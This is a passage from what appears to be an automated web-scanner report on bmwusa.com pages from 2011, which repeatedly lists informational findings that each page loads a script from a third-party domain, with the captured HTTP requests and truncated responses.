User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:43 GMT;path=/
Content-Length: 200807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.87. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:36 GMT;path=/
Content-Length: 215578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.88. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:35 GMT;path=/
Content-Length: 202557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.89. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:27 GMT;path=/
Content-Length: 214980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.90. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:52 GMT;path=/
Content-Length: 202285


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.91. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:05 GMT;path=/
Content-Length: 215689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.92. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:33 GMT;path=/
Content-Length: 202195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.93. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iscoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:23:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:43:30 GMT;path=/
Content-Length: 214786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.94. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:25:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:45:45 GMT;path=/
Content-Length: 202076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.95. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:20 GMT;path=/
Content-Length: 214910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.96. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:29 GMT;path=/
Content-Length: 202153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.97. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:39 GMT;path=/
Content-Length: 202155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.98. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:01 GMT;path=/
Content-Length: 214935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.99. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:11 GMT;path=/
Content-Length: 225966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.100. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
